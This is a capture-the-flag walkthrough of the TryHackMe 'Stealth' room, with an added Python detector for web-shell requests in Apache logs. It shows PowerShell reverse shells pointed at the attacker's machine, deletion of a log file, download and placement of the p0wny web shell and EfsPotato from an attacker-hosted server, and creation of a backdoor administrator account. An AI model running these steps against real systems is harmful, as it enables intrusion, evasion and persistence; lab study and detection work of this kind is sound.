Room Link: https://tryhackme.com/r/room/stealth
Scans
Initial scan
Longer scan
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/8000 - HTTPS
TCP/8080 - HTTPS
Initial Shell
Shell #1 attempt
This shell didn't work
Kali
git clone https://github.com/samratashok/nishang.git
cd nishang/Shells/
subl Invoke-PowerShellTcp.ps1
Kali(subl)
Invoke-PowerShellTcp -Reverse -IPAddress $KALI -Port 4444
Shell #2 attempt
This shell worked
Kali
git clone https://github.com/martinsohn/PowerShell-reverse-shell.git
cd PowerShell-reverse-shell/
subl powershell-reverse-shell.ps1
Change this line to the Kali IP:
Kali(subl)
Net.Sockets.TCPClient('$KALI', 4444)
Victim
cd C:\Users\evader\Desktop
dir
type encodedflag
Kali
echo WW91IGNhbiBnZXQgdGhlIGZsYWcgYnkgdmlzaXRpbmcgdGhlIGxpbmsgaHR0cDovLzxJUF9PRl9USElTX1BDPjo4MDAwL2FzZGFzZGFkYXNkamFramRuc2Rmc2Rmcy5waHA= | base64 --decode
Victim
cd C:\xampp\htdocs\uploads
del log.txt
Refresh the page and the flag is now visible.
Lateral Movement
Going by privs we don't have much, but since we have web access I tried adding a new shell and seeing if we get anything from it.
Kali
git clone https://github.com/flozz/p0wny-shell.git
cd p0wny-shell/
python2 -m SimpleHTTPServer 82
Victim
cd C:\xampp\htdocs
iwr -uri "http://$KALI:82/shell.php" -o shell.php
Even though we're the same user, the process behind this shell has SeImpersonatePrivilege enabled.
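Added example, not part of the original writeup: a small Python detector for the web-shell pattern used in this section, run over constructed Apache access-log lines in the combined format XAMPP writes. It flags successful requests for server-side scripts under /uploads/ and any script called with a cmd-style query parameter; the sample lines, the upload.php path and the parameter-name list are assumptions.

```python
import re

# Constructed Apache "combined"-format sample lines (not taken from the room).
SAMPLE_LOG = """\
10.10.10.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.10.5 - - [01/Jan/2024:10:00:09 +0000] "POST /upload.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.10.10.5 - - [01/Jan/2024:10:00:12 +0000] "GET /uploads/shell.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"
10.10.10.5 - - [01/Jan/2024:10:00:20 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.10.7 - - [01/Jan/2024:10:01:00 +0000] "GET /shell.php?cmd=whoami HTTP/1.1" 200 64 "-" "python-requests/2.31"
10.10.10.7 - - [01/Jan/2024:10:01:05 +0000] "GET /uploads/old.php HTTP/1.1" 404 196 "-" "python-requests/2.31"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Extensions Apache/PHP will execute; none of these belong in an upload directory.
SCRIPT_EXT = (".php", ".phtml", ".php3", ".php5", ".phar")
# Query parameters commonly used by simple command web shells (assumed list).
CMD_PARAM_RE = re.compile(r"(?:^|&)(?:cmd|exec|command)=", re.IGNORECASE)

def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, rec["query"] = rec["target"].partition("?")
    return rec

def find_webshell_indicators(log_text):
    """Return (ip, target, reason) tuples for requests that look like web-shell activity."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None or not rec["path"].lower().endswith(SCRIPT_EXT):
            continue
        served = rec["status"].startswith("2")  # 404s are noise, not execution
        if served and rec["path"].lower().startswith("/uploads/"):
            findings.append((rec["ip"], rec["target"], "script executed from upload directory"))
        elif CMD_PARAM_RE.search(rec["query"]):
            findings.append((rec["ip"], rec["target"], "command parameter passed to script"))
    return findings

if __name__ == "__main__":
    for ip, target, reason in find_webshell_indicators(SAMPLE_LOG):
        print(f"{ip} {target} -> {reason}")
```

On a real XAMPP host the same function can be pointed at apache\logs\access.log; a cleaner fix is to deny script execution in the upload directory in the Apache config so the first rule never fires at all.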
Privilege Escalation
I tried PrintSpoofer, but I couldn't execute the exe.
Attempt #1
Kali
git clone https://github.com/dievus/printspoofer
cd printspoofer/
python2 -m SimpleHTTPServer 82
Victim
cd C:\Users\evader\Desktop
iwr -uri "http://$KALI:82/PrintSpoofer.exe" -o PrintSpoofer.exe
PrintSpoofer.exe -i -c whoami
Attempt #2
We can see an EFI folder, so it looks like a clue about what to do.
Kali
git clone https://github.com/zcgonvh/EfsPotato.git
cd EfsPotato/
python2 -m SimpleHTTPServer 82
Victim
iwr -uri "http://10.10.252.180:82/EfsPotato.cs" -o efs.cs
Victim(p0wny-shell)
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe efs.cs -nowarn:1691,618
efs.exe "cmd.exe /c net user user password@123 /add && net localgroup administrators user /add"
Kali
remmina
Username: user
Password: password@123